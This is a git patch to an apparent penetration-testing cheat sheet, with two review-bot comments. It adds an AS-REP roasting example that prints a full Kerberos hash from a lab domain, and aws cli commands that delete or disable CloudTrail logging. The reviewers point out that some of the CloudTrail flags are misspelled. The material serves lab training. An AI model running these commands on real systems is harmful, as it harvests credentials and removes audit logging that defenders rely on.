From 95ab07b45eccbd57c00a889328187ba6356ec6f4 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Sat, 28 Mar 2020 12:01:56 +0100 Subject: [PATCH] CloudTrail disable, GraphQL tool --- GraphQL Injection/README.md | 1 + .../Active Directory Attack.md | 7 +++++++ .../Cloud - AWS Pentest.md | 19 +++++++++++++++++++ 3 files changed, 27 insertions(+) diff --git a/GraphQL Injection/README.md b/GraphQL Injection/README.md index 3a9883b..3719113 100644 --- a/GraphQL Injection/README.md +++ b/GraphQL Injection/README.md @@ -24,6 +24,7 @@ * [GraphQLmap - Scripting engine to interact with a graphql endpoint for pentesting purposes](https://github.com/swisskyrepo/GraphQLmap) * [GraphQL Security Toolkit - GraphQL Security Research Material](https://github.com/doyensec/graph-ql/) * [GraphQL IDE - An extensive IDE for exploring GraphQL API's](https://github.com/andev-software/graphql-ide) +* [InQL - A Burp Extension for GraphQL Security Testing](https://github.com/doyensec/inql) ## Exploit diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 395c02f..0da35ca 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md 
@@ -771,6 +771,13 @@ C:\Rubeus> john --wordlist=passwords_kerb.txt hashes.asreproast Using `impacket` to get the hash and `hashcat` to crack it. ```powershell +# example +$ python GetNPUsers.py htb.local/svc-alfresco -no-pass +Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation + +[*] Getting TGT for svc-alfresco +$krb5asrep$23$svc-alfresco@HTB.LOCAL:c13528009a59be0a634bb9b8e84c88ee$cb8e87d02bd0ac7ae561334cd58a56af90f7fbb20bbd4493b6754a57d5ebc08cb7f47ea472ebb7c9ba4260f57c11b664be03191550254e5c77a17518aeabc55f9321bd9f52201df820e130aa0e3f4b0986725fd3a14794433881050eb62d384c4058a407a348a7de2ef0767a99c9df4f85d8eba8ce30a4ad59621c51f8ea8c0d33f33e06bea1d8ff28d7a86fc2010fd7fa45d2fcc2178cb13c1006823aec8a5da10cffcceeb6e978754b0d4976df5cccb4beb9776d5a8f4810153ccc0e1237ec74e6ae61402457c6cfe29bca7c2f62b287f13aff063f5a0a21c728581e43b46d7537b3e776b4 + # extract hashes root@kali:impacket-examples$ python GetNPUsers.py jurassic.park/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast root@kali:impacket-examples$ python GetNPUsers.py jurassic.park/triceratops:Sh4rpH0rns -request -format hashcat -outputfile hashes.asreproast diff --git a/Methodology and Resources/Cloud - AWS Pentest.md b/Methodology and Resources/Cloud - AWS Pentest.md index 904f7d8..2342c2b 100644 --- a/Methodology and Resources/Cloud - AWS Pentest.md +++ b/Methodology and Resources/Cloud - AWS Pentest.md 
@@ -474,6 +474,25 @@ Prerequisite: 14. locally run `"secretsdump.py -system ./SYSTEM -ntds ./ntds.dit local -outputfile secrets'`, expects secretsdump to be on path +## Disable CloudTrail + +```powershell +$ aws cloudtrail delete-trail --name cloudgoat_trail --profile administrator +``` + +Disable monitoring of events from global services + +```powershell +$ aws cloudtrail update-trail --name cloudgoat_trail --no-include-global-service-event +``` + +Disable Cloud Trail on specific regions + +```powershell +$ aws cloudtrail update-trail --name cloudgoat_trail --no-include-global-service-event --no-is-multi-region --region=eu-west +``` + + ## Cover tracks by obfuscating Cloudtrail logs and Guard Duty :warning: When using awscli on Kali Linux, Pentoo and Parrot Linux, a log is generated based on the user-agent.
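Review bot: In the Active Directory hunk, the `# example` comment does not say what the new command demonstrates, and the pasted output makes the block hard to read. The added `$ python GetNPUsers.py htb.local/svc-alfresco -no-pass` line shows the single-user, no-credentials form, whereas the existing `# extract hashes` commands below it show the `-usersfile` and `-request` forms with `-format hashcat -outputfile hashes.asreproast`; say so in the comment (e.g. `# request the AS-REP for one known user without credentials`) and either place the example after the generic commands or add `-format hashcat -outputfile hashes.asreproast` to it so it feeds the `hashcat` step the surrounding text announces. The copied `Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation` banner and the several-hundred-character `$krb5asrep$23$svc-alfresco@HTB.LOCAL:...` blob can be cut to the first few characters plus `...`; the full value teaches nothing and overflows the fenced block.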
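Review bot: In the Cloud - AWS Pentest hunk, the flags on the two `update-trail` commands do not match the awscli option names: `--no-include-global-service-event` is missing the trailing `s` (`--no-include-global-service-events`) and `--no-is-multi-region` should be `--no-is-multi-region-trail`; as written both commands are rejected by the CLI. `--region=eu-west` is also not a complete region name (regions are of the form `eu-west-1`), and `--region` only selects the endpoint the API call is sent to; what narrows the trail to its home region is the multi-region flag, so the heading "Disable Cloud Trail on specific regions" (spelled `CloudTrail` elsewhere in the section) overstates what the command does. Two smaller points: the section is titled `## Disable CloudTrail` but its first command is `delete-trail`, which removes the trail rather than disabling it, so either label it as deletion or use `aws cloudtrail stop-logging --name cloudgoat_trail`, which matches the heading; and `--profile administrator` appears only on that first command, so the other two are implicitly run under the default profile.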